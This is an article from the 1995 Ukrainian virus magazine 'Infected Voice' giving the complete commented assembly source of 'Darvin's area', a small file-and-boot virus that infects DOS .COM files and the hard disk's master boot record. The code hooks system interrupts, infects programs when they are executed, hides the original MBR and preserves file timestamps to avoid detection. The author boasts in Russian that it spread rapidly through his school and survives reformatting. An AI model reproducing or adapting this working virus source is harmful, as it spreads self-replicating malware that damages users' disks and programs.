█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█  ▀					    ▀	       ██▀██▀██
█ STEALTH group █░ █ █▀▄ █▀▀ ▄▀▀ ▄▀▀ ▀█▀ ▄▀▀ █▀█    ▌ █ ▄▀█ █ ▄▀▀ ▄▀▀  ██ ▀▀ ██
█   presents	█░ █ █ █ █▀  █▀  █    █  █▀  █ █    █ █ █ █ █ █  ▀█▀▀  █████ ██
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█░ ▐ ▐ ▐ ▐   ▐▄▄ ▐▄▄  ▐  ▐▄▄ ▐▄▀     ▀█ ▀▄█ ▐ ▐▄▄ ▐▄▄  █████▄██
 ░░░░░░░░░░░░░░░░░						       JAN 1995

 INFECTED VOICE. Issue 4. January 1995.   (C) STEALTH group, Kiev 148, Box 10.
 THE FIRST UNIQUE VIRUS MAGAZINE IN FORMER U.S.S.R.!!!

;██████████████████████████████████████████████████████████████████████████
;██								         ██
;██ "Darvin's area."						         ██
;██    Version:   1.02             MC-512			         ██
;██	 (c) Light General					         ██
;██								         ██
;██								         ██
;██"На смену огромным динозаврам пришли мелкие млекопитающиеся грызуны." ██
;██		(Цитата из комментария к вирусу MC-512 .)		 ██
;██								         ██
;██	И так это случилось ->вирус заражающий .COM файлы и MBR первого	 ██
;██ винчестера умещен в размере загрузочного сектора!Может быть это и не ██
;██ слишком большое достижение (особенно если сказать,что с сим вирусом  ██
;██ глючат многие игрушки) но УЖЕ создан MCE-512 <- полноценный .COM .EXE██
;██ & MBR вирус не заражающий оверлеи,и даже имеющий "обработчик" int 24h██
;██	Т.к. в MCE вирусе нет места даже для одного лишнего байта - то я ██
;██ не буду представлять его исходник,а представлю свое первое детище на ██
;██ стезе MC-small!В нем достаточно свободного места для новых примочек! ██
;██								         ██
;██								         ██
;██	Written for STEALTH group - Kiev.1995.Light General       	 ██
;██								         ██
;██████████████████████████████████████████████████████████████████████████
  
		.model tiny
		.code
  
		org	100h

;################### MBR Part ####################
start:
		cld		; <- опознавательная метка заражения MBR!
		xor	di,di
		mov	ds,di
		cli
		mov	ss,di
		mov	si,7c00h
		mov	bx,si	; bx = 7C00h
		mov	sp,si
		sti
		dec	word ptr ds:[0413h] ; Откусим от системной памяти 1кб.
		int	12h	; AX = Total Memory (kb.)
;---------------------------------
		mov	cx,206h
		shl	ax,cl	; AX = сегмент откушенного килобайта.
		mov	es,ax
		mov	ax,offset inst_int-100h
		push	es
		push	ax
        	rep	movsb	; Переносим вирус в многострадальный килобайт!
		retf		; Передаем управление на перенесенное тело!
;----------------------------------------------
inst_int:
		cli
		mov	si,offset int_1Ch_entry-100h
		mov	byte ptr cs:[si],90h	; NOP
		mov	word ptr ds:[1Ch*4],si	; Садимся на таймерный вектор!
		mov	ds:[1Ch*4+2],es
		mov	ax,ds:[21h*4]
		mov	word ptr cs:[si+(1+offset ofs_21h-offset timer)],ax
		sti
;- Load origin MBR.-------------------
		push	cx
		push	bx
		mov	es,cx	; ES = 0000
		mov	ax,0201h
		mov	cl,05	; CX = 0005
		mov	dx,0080h
		int	13h	; Грузим оригинальный MBR и передаем ему
		retf		; управление!
;----------------------------------------------
; Эта часть запускается в зараженном .COM файле!
; В ее ф-ции входит :
;   - восстановление начальных байтов файла;
;   - заражение MBRа;
;   - запуск программы.

COM_install:
		cld
		call	$+3
COM_body:
		mov	ah,13h
		int	2fh
		mov	ax,25e2h	; Create int_0E2h == origin int_13h
		int	21h
		mov	ah,13h
		int	2fh
		pop	bp
		sub	bp,(offset COM_body-100h)
;-----------------------------------------------
		lea	bx,ds:[bp+offset MBR_buffer-100]
		mov	ax,0201h
		mov	cx,1
		mov	dx,0080h
		int	0E2h	; Read MBR!
		jc	Go_COM
		cmp	byte ptr es:[bx],0FCh	; CLD
		jz	Go_COM			; Already infected!
		mov	ax,0301h
		mov	cl,05
		push	ax
		int	0E2h	; Hide old MBR!
		pop	ax
		jc	Go_COM
		mov	bx,bp
		lea	si,ds:[bp+offset MBR_buffer+1beh-100h]
		lea	di,ds:[bp+offset Partirion-100h]
		mov	cl,21h
		rep	movsw	; Перенесем таблицу разделов винчестера в вирус!
		inc	cx
		int	0E2h	; Write virus to MBR!
Go_COM:
		lea	si,ds:[bp+offset origin_bytes-100h]
		mov	di,100h
		push	di
		movsw
		movsw
		ret	; Go to COM program!
;----------------------------------------------
; Процедура висит на векторе вызываемом из int 8h при каждом тике таймера.
; Она ожидает смену адреса на int 21h и при второй его смене перехватывает i21h!
int_1Ch_entry:
timer		db	90h	; <- 90h (NOP) or 0CFh (IRET)
		push	ds es ax
		xor	ax,ax
		mov	ds,ax
		les	ax,dword ptr ds:[21h*4]
ofs_21h:	cmp	ax,0000
		je	exit_1C
		inc	byte ptr cs:[513]
		cmp	byte ptr cs:[513],2
		je	exit_1C
		mov	ds:[0E1h*4],ax
		mov	ds:[0E1h*4+2],es
		mov	word ptr ds:[21h*4],offset int_21h_entry-100h
		mov	ds:[21h*4+2],cs
		mov	byte ptr cs:[offset timer-100h],0CFh	; IRET
exit_1C:
		pop	ax es ds
int_24h_entry:
		iret
;----------------------------------------------
int_21h_entry:
		push	es ds ax bx cx dx si di
		cmp	ax,4b00h	; Execute file?
		je	Exec		; Yes!
exit_pop:
		pop	di si dx cx bx ax ds es
		int	0E1h
		retf	2
;-Установим int_24h.---------------------------
Exec:
		mov	ax,3524h
		int	0E1h
		push	es bx	; Adr. in stack!
;-----
		push	ds dx
		push	cs
		pop	ds
		mov	ah,25h
		mov	dx,offset int_24h_entry-100h
		int	0E1h
		pop	dx ds
;-Откроем файл.---------------------------------
		mov	ax,3d00h
		int	0E1h
		jc	exit_int
;- Read 4 first bytes!--------------
		mov	bh,3fh
		xchg	ax,bx
		mov	cx,04
		mov	dx,offset origin_bytes-100h
		mov	si,dx
		push	cs
		pop	ds
		int	0E1h
		jc	exit_int
;- Compare MZ & Ё (.EXE file and infect label).------
		cmp	byte ptr ds:[si],'M'	; .EXE file ?
		jz	exit_int
		cmp	byte ptr ds:[si+3],'Ё'	; Already infected ?
		jz	exit_int
;- Look SFT.-----------------------------------------
		mov	ax,1220h
		push	bx
		int	2fh
		mov	bl,es:[di]
		mov	ax,1216h
		int	2fh
		pop	bx
		mov	byte ptr es:[di+2],02	; Open mode = r/w
;- Infect this file!------------------------------
		mov	ax,es:[di+17]	; File len.
		cmp	ax,64000
		ja	exit_int
		mov	es:[di+21],ax	; F.p.= end file!
;- Make JMP.--------------------------------------
		add	ax,((offset COM_install-100h)-3)
		mov	word ptr ds:[offset start_jmp-100h],ax
;-------------------------------------------------
		xor	dx,dx	; Пишем вирус в файл!
		mov	cx,512
		mov	ah,40h
		int	0E1h	; Write virus body!
;-------------------------------------------------
		mov	es:[di+21],dx	; F.p.= start file!
		mov	dx,offset new_bytes-100h
		mov	cx,04
		mov	ah,40h
		int	0E1h	; Write jmp in start file!
;-------------------------------------------------
		mov	ax,5701h
		mov	dx,es:[di+15]
		mov	cx,es:[di+13]
		int	0E1h	; Set old date/time!
exit_int:
		mov	ah,3eh	; Close file!
		int	0E1h
		mov	ax,2524h	; Restore origin int_24h!
		pop	dx ds
		int	0E1h
		jmp	exit_pop
;----------------------------------------------
origin_bytes	db	4 dup (90h)

new_bytes	db	0e9h
start_jmp	dw	0000
		db	'Ё'
;----------------------------------------------
		dw	0000
Copyright	db	'(c) Light General.For free use!Kiev.1995'
;-Partition Table for MBR.---------------------
		org	1beh+100h

Partirion	db	(21h*2) dup ('$')
;----------------------------------------------
MBR_buffer	db	512 dup (?)
;----------------------------------------------
		end	start


; Внимание - вирус был разработан для проверки выживаемости малых организмов в
;активной вирусной и антивирусных средах!
; В целом сие произведение доказывает как опасен мелкий файлово-бутовый вирус -
;ибо в моем учебном заведении он распространился с ураганной скоростью!!!
;Причем избавится от него нельзя даже переформатированием диска C:\ - т.к.
;при этом не производится замена MBRа!
; Написание лечилки настолько тривиально,что даже не заслуживает внимания.